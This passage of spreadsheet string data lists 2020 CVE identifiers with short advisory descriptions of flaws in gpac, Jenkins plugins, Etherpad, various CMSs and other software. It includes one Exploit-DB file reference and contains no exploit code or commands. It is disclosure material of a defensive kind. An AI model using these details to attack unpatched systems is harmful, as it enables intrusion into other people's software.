    <t>An issue was discovered in gpac 0.8.0. An invalid memory dereference exists in the function FixTrackID located in isom_intern.c, which allows attackers to cause a denial of service (DoS) via a crafted input.</t>
  </si>
  <si>
    <t>CVE-2020-22675</t>
  </si>
  <si>
    <t>An issue was discovered in gpac 0.8.0. The GetGhostNum function in stbl_read.c has a heap-based buffer overflow which can lead to a denial of service (DOS) via a crafted input.</t>
  </si>
  <si>
    <t>CVE-2020-22677</t>
  </si>
  <si>
    <t>An issue was discovered in gpac 0.8.0. The dump_data_hex function in box_dump.c has a heap-based buffer overflow which can lead to a denial of service (DOS) via a crafted input.</t>
  </si>
  <si>
    <t>CVE-2020-22678</t>
  </si>
  <si>
    <t>An issue was discovered in gpac 0.8.0. The gf_media_nalu_remove_emulation_bytes function in av_parsers.c has a heap-based buffer overflow which can lead to a denial of service (DOS) via a crafted input.</t>
  </si>
  <si>
    <t>CVE-2020-22679</t>
  </si>
  <si>
    <t>Memory leak in the sgpd_parse_entry function in MP4Box in gpac 0.8.0 allows attackers to cause a denial of service (DoS) via a crafted input.</t>
  </si>
  <si>
    <t>CVE-2020-2268</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) vulnerability in Jenkins MongoDB Plugin 1.3 and earlier allows attackers to gain access to some metadata of any arbitrary files on the Jenkins controller.</t>
  </si>
  <si>
    <t>CVE-2020-2269</t>
  </si>
  <si>
    <t>Jenkins chosen-views-tabbar Plugin 1.2 and earlier does not escape view names in the dropdown to select views, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with the ability to configure views.</t>
  </si>
  <si>
    <t>CVE-2020-2270</t>
  </si>
  <si>
    <t>Jenkins ClearCase Release Plugin 0.3 and earlier does not escape the composite baseline in badge tooltip, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.</t>
  </si>
  <si>
    <t>CVE-2020-2271</t>
  </si>
  <si>
    <t>Jenkins Locked Files Report Plugin 1.6 and earlier does not escape locked files' names in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.</t>
  </si>
  <si>
    <t>CVE-2020-22719</t>
  </si>
  <si>
    <t>Shimo Document v2.0.1 contains a cross-site scripting (XSS) vulnerability which allows attackers to execute arbitrary web scripts or HTML via a crafted payload inserted into the table content text field.</t>
  </si>
  <si>
    <t>CVE-2020-2272</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins ElasTest Plugin 1.2.1 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials.</t>
  </si>
  <si>
    <t>CVE-2020-22721</t>
  </si>
  <si>
    <t>A File Upload Vulnerability in PNotes - Andrey Gruber PNotes.NET v3.8.1.2 allows a local attacker to execute arbitrary code via the Miscellaneous " External Programs by uploading the malicious .exe file to the external program.</t>
  </si>
  <si>
    <t>CVE-2020-22722</t>
  </si>
  <si>
    <t>Rapid Software LLC Rapid SCADA 5.8.0 is affected by a local privilege escalation vulnerability in the ScadaAgentSvc.exe executable file. An attacker can obtain admin privileges by placing a malicious .exe file in the application and renaming it ScadaAgentSvc.exe, which would result in executing the binary as NT AUTHORITY\SYSTEM in a Windows operating system. For example, an attacker can plant a reverse shell from a low privileged user account and by restarting the computer, the malicious service will be started as NT AUTHORITY\SYSTEM by giving the attacker full system access to the remote PC.</t>
  </si>
  <si>
    <t>CVE-2020-22723</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in Beijing Liangjing Zhicheng Technology Co., Ltd ljcmsshop version 1.14 allows remote attackers to inject arbitrary web script or HTML via user.php by registering an account directly in the user center, and then adding the payload to the delivery address.</t>
  </si>
  <si>
    <t>CVE-2020-22724</t>
  </si>
  <si>
    <t>A remote command execution vulnerability exists in add_server_service of PPTP_SERVER in Mercury Router MER1200 v1.0.1 and Mercury Router MER1200G v1.0.1.</t>
  </si>
  <si>
    <t>CVE-2020-2273</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) vulnerability in Jenkins ElasTest Plugin 1.2.1 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials.</t>
  </si>
  <si>
    <t>CVE-2020-22732</t>
  </si>
  <si>
    <t>CMS Made Simple (CMSMS) 2.2.14 allows stored XSS via the Extensions &gt; Fie Picker..</t>
  </si>
  <si>
    <t>CVE-2020-2274</t>
  </si>
  <si>
    <t>Jenkins ElasTest Plugin 1.2.1 and earlier stores its server password unencrypted in its global configuration file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system.</t>
  </si>
  <si>
    <t>CVE-2020-22741</t>
  </si>
  <si>
    <t>An issue was discovered in Xuperchain 3.6.0 that allows for attackers to recover any arbitrary users' private key after obtaining the partial signature in multisignature.</t>
  </si>
  <si>
    <t>CVE-2020-2275</t>
  </si>
  <si>
    <t>Jenkins Copy data to workspace Plugin 1.0 and earlier does not limit which directories can be copied from the Jenkins controller to job workspaces, allowing attackers with Job/Configure permission to read arbitrary files on the Jenkins controller.</t>
  </si>
  <si>
    <t>CVE-2020-2276</t>
  </si>
  <si>
    <t>Jenkins Selection tasks Plugin 1.0 and earlier executes a user-specified program on the Jenkins controller, allowing attackers with Job/Configure permission to execute an arbitrary system command on the Jenkins controller as the OS user that the Jenkins process is running as.</t>
  </si>
  <si>
    <t>CVE-2020-22761</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) vulnerability in FlatPress 1.1 via the DeleteFile function in flat/admin.php.</t>
  </si>
  <si>
    <t>CVE-2020-22765</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in NukeViet cms 4.4.0 via the editor in the News module.</t>
  </si>
  <si>
    <t>CVE-2020-2277</t>
  </si>
  <si>
    <t>Jenkins Storable Configs Plugin 1.0 and earlier allows users with Job/Read permission to read arbitrary files on the Jenkins controller.</t>
  </si>
  <si>
    <t>CVE-2020-2278</t>
  </si>
  <si>
    <t>Jenkins Storable Configs Plugin 1.0 and earlier does not restrict the user-specified file name, allowing attackers with Job/Configure permission to replace any other '.xml' file on the Jenkins controller with a job config.xml file's content.</t>
  </si>
  <si>
    <t>CVE-2020-22781</t>
  </si>
  <si>
    <t>In Etherpad &lt; 1.8.3, a specially crafted URI would raise an unhandled exception in the cache mechanism and cause a denial of service (crash the instance).</t>
  </si>
  <si>
    <t>CVE-2020-22782</t>
  </si>
  <si>
    <t>Etherpad &lt; 1.8.3 is affected by a denial of service in the import functionality. Upload of binary file to the import endpoint would crash the instance.</t>
  </si>
  <si>
    <t>CVE-2020-22783</t>
  </si>
  <si>
    <t>Etherpad &lt;1.8.3 stored passwords used by users insecurely in the database and in log files. This affects every database backend supported by Etherpad.</t>
  </si>
  <si>
    <t>CVE-2020-22784</t>
  </si>
  <si>
    <t>In Etherpad UeberDB &lt; 0.4.4, due to MySQL omitting trailing spaces on char / varchar columns during comparisons, retrieving database records using UeberDB's MySQL connector could allow bypassing access controls enforced on key names.</t>
  </si>
  <si>
    <t>CVE-2020-22785</t>
  </si>
  <si>
    <t>Etherpad &lt; 1.8.3 is affected by a missing lock check which could cause a denial of service. Aggressively targeting random pad import endpoints with empty data would flatten all pads due to lack of rate limiting and missing ownership check.</t>
  </si>
  <si>
    <t>CVE-2020-22789</t>
  </si>
  <si>
    <t>Unauthenticated Stored XSS in FME Server versions 2019.2 and 2020.0 Beta allows a remote attacker to gain admin privileges by injecting arbitrary web script or HTML via the login page. The XSS is executed when an administrator accesses the logs.</t>
  </si>
  <si>
    <t>CVE-2020-2279</t>
  </si>
  <si>
    <t>A sandbox bypass vulnerability in Jenkins Script Security Plugin 1.74 and earlier allows attackers with permission to define sandboxed scripts to provide crafted return values or script binding content that can result in arbitrary code execution on the Jenkins controller JVM.</t>
  </si>
  <si>
    <t>CVE-2020-22790</t>
  </si>
  <si>
    <t>Authenticated Stored XSS in FME Server versions 2019.2 and 2020.0 Beta allows a remote attacker to execute codeby injecting arbitrary web script or HTML via modifying the name of the users. The XSS is executed when an administrator access the logs.</t>
  </si>
  <si>
    <t>CVE-2020-2280</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) vulnerability in Jenkins Warnings Plugin 5.0.1 and earlier allows attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-22807</t>
  </si>
  <si>
    <t>An issue was dicovered in vtiger crm 7.2. Union sql injection in the calendar exportdata feature.</t>
  </si>
  <si>
    <t>CVE-2020-22808</t>
  </si>
  <si>
    <t>An issue was found in yii2_fecshop 2.x. There is a reflected XSS vulnerability in the check cart page.</t>
  </si>
  <si>
    <t>CVE-2020-22809</t>
  </si>
  <si>
    <t>In Windscribe v1.83 Build 20, 'WindscribeService' has an Unquoted Service Path that facilitates privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-2281</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) vulnerability in Jenkins Lockable Resources Plugin 2.8 and earlier allows attackers to reserve, unreserve, unlock, and reset resources.</t>
  </si>
  <si>
    <t>CVE-2020-22818</t>
  </si>
  <si>
    <t>MKCMS V6.2 has SQL injection via /ucenter/reg.php name parameter.</t>
  </si>
  <si>
    <t>CVE-2020-22819</t>
  </si>
  <si>
    <t>MKCMS V6.2 has SQL injection via the /ucenter/active.php verify parameter.</t>
  </si>
  <si>
    <t>CVE-2020-2282</t>
  </si>
  <si>
    <t>Jenkins Implied Labels Plugin 0.6 and earlier does not perform a permission check in an HTTP endpoint, allowing attackers with Overall/Read permission to configure the plugin.</t>
  </si>
  <si>
    <t>CVE-2020-22820</t>
  </si>
  <si>
    <t>MKCMS V6.2 has SQL injection via the /ucenter/repass.php name parameter.</t>
  </si>
  <si>
    <t>CVE-2020-2283</t>
  </si>
  <si>
    <t>Jenkins Liquibase Runner Plugin 1.4.5 and earlier does not escape changeset contents, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by users able to control changeset files evaluated by the plugin.</t>
  </si>
  <si>
    <t>CVE-2020-22839</t>
  </si>
  <si>
    <t>Reflected cross-site scripting vulnerability (XSS) in the evoadm.php file in b2evolution cms version 6.11.6-stable allows remote attackers to inject arbitrary webscript or HTML code via the tab3 parameter.</t>
  </si>
  <si>
    <t>CVE-2020-2284</t>
  </si>
  <si>
    <t>Jenkins Liquibase Runner Plugin 1.4.5 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49551.txt</t>
  </si>
  <si>
    <t>b2evolution 6.11.6 - 'plugin name' Stored XSS</t>
  </si>
  <si>
    <t>2021-02-10</t>
  </si>
  <si>
    <t>CVE-2020-22840</t>
  </si>
  <si>
    <t>Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php.</t>
  </si>
  <si>
    <t>CVE-2020-22841</t>
  </si>
  <si>
    <t>Stored XSS in b2evolution CMS version 6.11.6 and prior allows an attacker to perform malicious JavaScript code execution via the plugin name input field in the plugin module.</t>
  </si>
  <si>
    <t>CVE-2020-22842</t>
  </si>
  <si>
    <t>CMS Made Simple before 2.2.15 allows XSS via the m1_mod parameter in a ModuleManager local_uninstall action to admin/moduleinterface.php.</t>
  </si>
  <si>
    <t>CVE-2020-22844</t>
  </si>
  <si>
    <t>A buffer overflow in Mikrotik RouterOS 6.47 allows unauthenticated attackers to cause a denial of service (DOS) via crafted SMB requests.</t>
  </si>
  <si>
    <t>CVE-2020-22845</t>
  </si>
  <si>
    <t>A buffer overflow in Mikrotik RouterOS 6.47 allows unauthenticated attackers to cause a denial of service (DOS) via crafted FTP requests.</t>
  </si>
  <si>
    <t>CVE-2020-22848</t>
  </si>
  <si>
    <t>A remote code execution (RCE) vulnerability in the \Playsong.php component of cscms v4.1 allows attackers to execute arbitrary commands.</t>
  </si>
  <si>
    <t>CVE-2020-2285</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins Liquibase Runner Plugin 1.4.7 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.</t>
  </si>
  <si>
    <t>CVE-2020-2286</t>
  </si>
  <si>
    <t>Jenkins Role-based Authorization Strategy Plugin 3.0 and earlier does not properly invalidate a permission cache when the configuration is changed, resulting in permissions being granted based on an outdated configuration.</t>
  </si>
  <si>
    <t>CVE-2020-22864</t>
  </si>
  <si>
    <t>A cross site scripting (XSS) vulnerability in the Insert Video function of Froala WYSIWYG Editor 3.1.0 allows attackers to execute arbitrary web scripts or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-2287</t>
  </si>
  <si>
    <t>Jenkins Audit Trail Plugin 3.6 and earlier applies pattern matching to a different representation of request URL paths than the Stapler web framework uses for dispatching requests, which allows attackers to craft URLs that bypass request logging of any target URL.</t>
  </si>
  <si>
    <t>435</t>
  </si>
  <si>
    <t>CVE-2020-22873</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in function NumberToPrecisionCmd in jsish before 3.0.7, allows remote attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-22874</t>
  </si>
  <si>
    <t>Integer overflow vulnerability in function Jsi_ObjArraySizer in jsish before 3.0.8, allows remote attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-22875</t>
  </si>
  <si>
    <t>Integer overflow vulnerability in function Jsi_ObjSetLength in jsish before 3.0.6, allows remote attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-22876</t>
  </si>
  <si>
    <t>Buffer Overflow vulnerability in quickjs.c in QuickJS, allows remote attackers to cause denial of service. This issue is resolved in the 2020-07-05 release.</t>
  </si>
  <si>
    <t>CVE-2020-2288</t>
  </si>
  <si>
    <t>In Jenkins Audit Trail Plugin 3.6 and earlier, the default regular expression pattern could be bypassed in many cases by adding a suffix to the URL that would be ignored during request handling.</t>
  </si>
  <si>
    <t>CVE-2020-22882</t>
  </si>
  <si>
    <t>Issue was discovered in the fxParserTree function in moddable, allows attackers to cause denial of service via a crafted payload. Fixed in commit 723816ab9b52f807180c99fc69c7d08cf6c6bd61.</t>
  </si>
  <si>
    <t>CVE-2020-22884</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in function jsvGetStringChars in Espruino before RELEASE_2V09, allows remote attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-22885</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in mujs before 1.0.8 due to recursion in the GC scanning phase, allows remote attackers to cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-22886</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in function jsG_markobject in jsgc.c in mujs before 1.0.8, allows remote attackers to cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-2289</t>
  </si>
  <si>
    <t>Jenkins Active Choices Plugin 2.4 and earlier does not escape the name and description of build parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.</t>
  </si>
  <si>
    <t>CVE-2020-2290</t>
  </si>
  <si>
    <t>Jenkins Active Choices Plugin 2.4 and earlier does not escape some return values of sandboxed scripts for Reactive Reference Parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.</t>
  </si>
  <si>
    <t>CVE-2020-22907</t>
  </si>
  <si>
    <t>Stack overflow vulnerability in function jsi_evalcode_sub in jsish before 3.0.18, allows remote attackers to cause a Denial of Service via a crafted value to the execute parameter.</t>
  </si>
  <si>
    <t>CVE-2020-2291</t>
  </si>
  <si>
    <t>Jenkins couchdb-statistics Plugin 0.3 and earlier stores its server password unencrypted in its global configuration file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system.</t>
  </si>
  <si>
    <t>CVE-2020-2292</t>
  </si>
  <si>
    <t>Jenkins Release Plugin 2.10.2 and earlier does not escape the release version in badge tooltip, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Release/Release permission.</t>
  </si>
  <si>
    <t>CVE-2020-2293</t>
  </si>
  <si>
    <t>Jenkins Persona Plugin 2.4 and earlier allows users with Overall/Read permission to read arbitrary files on the Jenkins controller.</t>
  </si>
  <si>
    <t>CVE-2020-22937</t>
  </si>
  <si>
    <t>A remote code execution (RCE) in e/install/index.php of EmpireCMS 7.5 allows attackers to execute arbitrary PHP code via writing malicious code to the install file.</t>
  </si>
  <si>
    <t>CVE-2020-2294</t>
  </si>
  <si>
    <t>Jenkins Maven Cascade Release Plugin 1.3.2 and earlier does not perform permission checks in several HTTP endpoints, allowing attackers with Overall/Read permission to start cascade builds and layout builds, and reconfigure the plugin.</t>
  </si>
  <si>
    <t>CVE-2020-2295</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) vulnerability in Jenkins Maven Cascade Release Plugin 1.3.2 and earlier allows attackers to start cascade builds and layout builds, and reconfigure the plugin.</t>
  </si>
  <si>
    <t>CVE-2020-2296</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) vulnerability in Jenkins Shared Objects Plugin 0.44 and earlier allows attackers to configure shared objects.</t>
  </si>
  <si>
    <t>CVE-2020-2297</t>
  </si>
  <si>
    <t>Jenkins SMS Notification Plugin 1.2 and earlier stores an access token unencrypted in its global configuration file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system.</t>
  </si>
  <si>
    <t>CVE-2020-2298</t>
  </si>
  <si>
    <t>Jenkins Nerrvana Plugin 1.02.06 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-22983</t>
  </si>
  <si>
    <t>A Server-Side Request Forgery (SSRF) vulnerability exists in MicroStrategy Web SDK 11.1 and earlier, allows remote unauthenticated attackers to conduct a server-side request forgery (SSRF) attack via the srcURL parameter to the shortURL task.</t>
  </si>
  <si>
    <t>CVE-2020-22984</t>
  </si>
  <si>
    <t>Cross-Site Scripting (XSS) vulnerability in MicroStrategy Web SDK 10.11 and earlier, allows remote unauthenticated attackers to execute arbitrary code via key parameter to the getGoogleExtraConfig task.</t>
  </si>
  <si>
    <t>CVE-2020-22985</t>
  </si>
  <si>
    <t>Cross-Site Scripting (XSS) vulnerability in MicroStrategy Web SDK 10.11 and earlier, allows remote unauthenticated attackers to execute arbitrary code via the key parameter to the getESRIExtraConfig task.</t>
  </si>
  <si>
    <t>CVE-2020-22986</t>
  </si>
  <si>
    <t>Cross-Site Scripting (XSS) vulnerability in MicroStrategy Web SDK 10.11 and earlier, allows remote unauthenticated attackers to execute arbitrary code via the searchString parameter to the wikiScrapper task.</t>
  </si>
  <si>
    <t>CVE-2020-22987</t>
  </si>
  <si>
    <t>Cross-Site Scripting (XSS) vulnerability in MicroStrategy Web SDK 10.11 and earlier, allows remote unauthenticated attackers to execute arbitrary code via the fileToUpload parameter to the uploadFile task.</t>
  </si>
  <si>
    <t>CVE-2020-2299</t>
  </si>
  <si>
    <t>Jenkins Active Directory Plugin 2.19 and earlier allows attackers to log in as any user if a magic constant is used as the password.</t>
  </si>
  <si>
    <t>CVE-2020-2300</t>
  </si>
  <si>
    <t>Jenkins Active Directory Plugin 2.19 and earlier does not prohibit the use of an empty password in Windows/ADSI mode, which allows attackers to log in to Jenkins as any user depending on the configuration of the Active Directory server.</t>
  </si>
  <si>
    <t>CVE-2020-2301</t>
  </si>
  <si>
    <t>Jenkins Active Directory Plugin 2.19 and earlier allows attackers to log in as any user with any password while a successful authentication of that user is still in the optional cache when using Windows/ADSI mode.</t>
  </si>
  <si>
    <t>CVE-2020-23014</t>
  </si>
  <si>
    <t>APfell 1.4 is vulnerable to authenticated reflected cross-site scripting (XSS) in /apiui/command_ through the payloadtypes_callback function, which allows an attacker to steal remote admin/user session and/or adding new users to the administration panel.</t>
  </si>
  <si>
    <t>CVE-2020-23015</t>
  </si>
  <si>
    <t>An open redirect issue was discovered in OPNsense through 20.1.5. The redirect parameter "url" in login page was not filtered and can redirect user to any website.</t>
  </si>
  <si>
    <t>CVE-2020-2302</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins Active Directory Plugin 2.19 and earlier allows attackers with Overall/Read permission to access the domain health check diagnostic page.</t>
  </si>
  <si>
    <t>CVE-2020-23026</t>
  </si>
  <si>
    <t>A NULL pointer dereference in the main() function dhry_1.c of dhrystone 2.1 causes a denial of service (DoS).</t>
  </si>
  <si>
    <t>CVE-2020-2303</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) vulnerability in Jenkins Active Directory Plugin 2.19 and earlier allows attackers to perform connection tests, connecting to attacker-specified or previously configured Active Directory servers using attacker-specified credentials.</t>
  </si>
  <si>
    <t>CVE-2020-23036</t>
  </si>
  <si>
    <t>MEDIA NAVI Inc SMACom v1.2 was discovered to contain an insecure session validation vulnerability in the session handling of the `password` authentication parameter of the wifi photo transfer module. This vulnerability allows attackers with network access privileges or on public wifi networks to read the authentication credentials and follow-up requests containing the user password via a man in the middle attack.</t>
  </si>
  <si>
    <t>CVE-2020-23037</t>
  </si>
  <si>
    <t>Portable Ltd Playable v9.18 contains a code injection vulnerability in the filename parameter, which allows attackers to execute arbitrary web scripts or HTML via a crafted POST request.</t>
  </si>
  <si>
    <t>CVE-2020-23038</t>
  </si>
  <si>
    <t>Swift File Transfer Mobile v1.1.2 and below was discovered to contain an information disclosure vulnerability in the path parameter. This vulnerability is exploited via an error caused by including non-existent path environment variables.</t>
  </si>
  <si>
    <t>CVE-2020-23039</t>
  </si>
  <si>
    <t>Folder Lock v3.4.5 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Create Folder function under the 'create' module. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload as a path or folder name.</t>
  </si>
  <si>
    <t>CVE-2020-2304</t>
  </si>
  <si>
    <t>Jenkins Subversion Plugin 2.13.1 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-23040</t>
  </si>
  <si>
    <t>Sky File v2.1.0 contains a directory traversal vulnerability in the FTP server which allows attackers to access sensitive data and files via 'null' path commands.</t>
  </si>
  <si>
    <t>CVE-2020-23041</t>
  </si>
  <si>
    <t>Dropouts Technologies LLP Air Share v1.2 was discovered to contain a cross-site scripting (XSS) vulnerability in the path parameter of the `list` and `download` exception-handling. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted GET request.</t>
  </si>
  <si>
    <t>CVE-2020-23042</t>
  </si>
  <si>
    <t>Dropouts Technologies LLP Super Backup v2.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability in the path parameter of the `list` and `download` module. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted GET request.</t>
  </si>
  <si>
    <t>CVE-2020-23043</t>
  </si>
  <si>
    <t>Tran Tu Air Sender v1.0.2 was discovered to contain an arbitrary file upload vulnerability in the upload module. This vulnerability allows attackers to execute arbitrary code via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-23044</t>
  </si>
  <si>
    <t>DedeCMS v7.5 SP2 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities in the component file_pic_view.php via the `activepath`, `keyword`, `tag`, `fmdo=x&amp;filename`, `CKEditor` and `CKEditorFuncNum` parameters.</t>
  </si>
  <si>
    <t>CVE-2020-23045</t>
  </si>
  <si>
    <t>Macrob7 Macs Framework Content Management System - 1.14f was discovered to contain a SQL injection vulnerability via the 'roleId' parameter of the `editRole` and `deletUser` modules.</t>
  </si>
  <si>
    <t>CVE-2020-23046</t>
  </si>
  <si>
    <t>DedeCMS v7.5 SP2 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities in the component tpl.php via the `filename`, `mid`, `userid`, and `templet' parameters.</t>
  </si>
  <si>
    <t>CVE-2020-23047</t>
  </si>
  <si>
    <t>Macrob7 Macs Framework Content Management System - 1.14f was discovered to contain a cross-site scripting (XSS) vulnerability in the search input field of the search module.</t>
  </si>
  <si>
    <t>CVE-2020-23048</t>
  </si>
  <si>
    <t>SeedDMS Content Management System v6.0.7 contains a persistent cross-site scripting (XSS) vulnerability in the component AddEvent.php via the name and comment parameters.</t>
  </si>
  <si>
    <t>CVE-2020-23049</t>
  </si>
  <si>
    <t>Fork CMS Content Management System v5.8.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the `Displayname` field when using the `Add`, `Edit` or `Register' functions. This vulnerability allows attackers to execute arbitrary web scripts or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-2305</t>
  </si>
  <si>
    <t>Jenkins Mercurial Plugin 2.11 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-23050</t>
  </si>
  <si>
    <t>TAO Open Source Assessment Platform v3.3.0 RC02 was discovered to contain a HTML injection vulnerability in the userFirstName parameter of the user account input field. This vulnerability allows attackers to execute phishing attacks, external redirects, and arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-23051</t>
  </si>
  <si>
    <t>Phpgurukul User Registration &amp; User Management System v2.0 was discovered to contain multiple stored cross-site scripting (XSS) vulnerabilities via the firstname and lastname parameters of the registration form &amp; loginsystem input fields.</t>
  </si>
  <si>
    <t>CVE-2020-23052</t>
  </si>
  <si>
    <t>Catalyst IT Ltd Mahara CMS v19.10.2 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities in the component groupfiles.php via the Number (Nombre) and Description (Descripción) parameters.</t>
  </si>
  <si>
    <t>CVE-2020-23054</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in NSK User Agent String Switcher Service v0.3.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the user agent input field.</t>
  </si>
  <si>
    <t>CVE-2020-23055</t>
  </si>
  <si>
    <t>ANCOM WLAN Controller (Wireless Series &amp; Hotspot) WLC-1000 &amp; WLC-4006 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities in the /authen/start/ module via the userid and password parameters.</t>
  </si>
  <si>
    <t>CVE-2020-23058</t>
  </si>
  <si>
    <t>An issue in the authentication mechanism in Nong Ge File Explorer v1.4 unauthenticated allows to access sensitive data.</t>
  </si>
  <si>
    <t>CVE-2020-2306</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins Mercurial Plugin 2.11 and earlier allows attackers with Overall/Read permission to obtain a list of names of configured Mercurial installations.</t>
  </si>
  <si>
    <t>CVE-2020-23060</t>
  </si>
  <si>
    <t>Internet Download Manager 6.37.11.1 was discovered to contain a stack buffer overflow in the Export/Import function. This vulnerability allows attackers to escalate local process privileges via a crafted ef2 file.</t>
  </si>
  <si>
    <t>CVE-2020-23061</t>
  </si>
  <si>
    <t>Dropouts Technologies LLP Super Backup v2.0.5 was discovered to contain an issue in the path parameter of the `list` and `download` module which allows attackers to perform a directory traversal via a change to the path variable to request the local list command.</t>
  </si>
  <si>
    <t>CVE-2020-23069</t>
  </si>
  <si>
    <t>Path Traversal vulneraility exists in webTareas 2.0 via the extpath parameter in general_serv.php, which could let a malicious user read arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2020-2307</t>
  </si>
  <si>
    <t>Jenkins Kubernetes Plugin 1.27.3 and earlier allows low-privilege users to access possibly sensitive Jenkins controller environment variables.</t>
  </si>
  <si>
    <t>CVE-2020-23079</t>
  </si>
  <si>
    <t>SSRF vulnerability in Halo &lt;=1.3.2 exists in the SMTP configuration, which can detect the server intranet.</t>
  </si>
  <si>
    <t>CVE-2020-2308</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins Kubernetes Plugin 1.27.3 and earlier allows attackers with Overall/Read permission to list global pod template names.</t>
  </si>
  <si>
    <t>CVE-2020-23083</t>
  </si>
  <si>
    <t>Unrestricted File Upload in JEECG v4.0 and earlier allows remote attackers to execute arbitrary code or gain privileges by uploading a crafted file to the component "jeecgFormDemoController.do?commonUpload".</t>
  </si>
  <si>
    <t>CVE-2020-2309</t>
  </si>
  <si>
    <t>A missing/An incorrect permission check in Jenkins Kubernetes Plugin 1.27.3 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.</t>
  </si>
  <si>
    <t>CVE-2020-2310</t>
  </si>
  <si>
    <t>Missing permission checks in Jenkins Ansible Plugin 1.0 and earlier allow attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.</t>
  </si>
  <si>
    <t>CVE-2020-23109</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in function convert_colorspace in heif_colorconversion.cc in libheif v1.6.2, allows attackers to cause a denial of service and disclose sensitive information, via a crafted HEIF file.</t>
  </si>
  <si>
    <t>CVE-2020-2311</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins AWS Global Configuration Plugin 1.5 and earlier allows attackers with Overall/Read permission to replace the global AWS configuration.</t>
  </si>
  <si>
    <t>CVE-2020-2312</t>
  </si>
  <si>
    <t>Jenkins SQLPlus Script Runner Plugin 2.0.12 and earlier does not mask a password provided as command line argument in build logs.</t>
  </si>
  <si>
    <t>CVE-2020-23126</t>
  </si>
  <si>
    <t>Chamilo LMS version 1.11.10 contains an XSS vulnerability in the personal profile edition form, affecting the user him/herself and social network friends.</t>
  </si>
  <si>
    <t>CVE-2020-23127</t>
  </si>
  <si>
    <t>Chamilo LMS 1.11.10 is affected by Cross Site Request Forgery (CSRF) via the edit_user function by targeting an admin user.</t>
  </si>
  <si>
    <t>CVE-2020-23128</t>
  </si>
  <si>
    <t>Chamilo LMS 1.11.10 does not properly manage privileges which could allow a user with Sessions administrator privilege to create a new user then use the edit user function to change this new user to administrator privilege.</t>
  </si>
  <si>
    <t>CVE-2020-2313</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins Azure Key Vault Plugin 2.0 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.</t>
  </si>
  <si>
    <t>CVE-2020-23136</t>
  </si>
  <si>
    <t>Microweber v1.1.18 is affected by no session expiry after log-out.</t>
  </si>
  <si>
    <t>CVE-2020-23138</t>
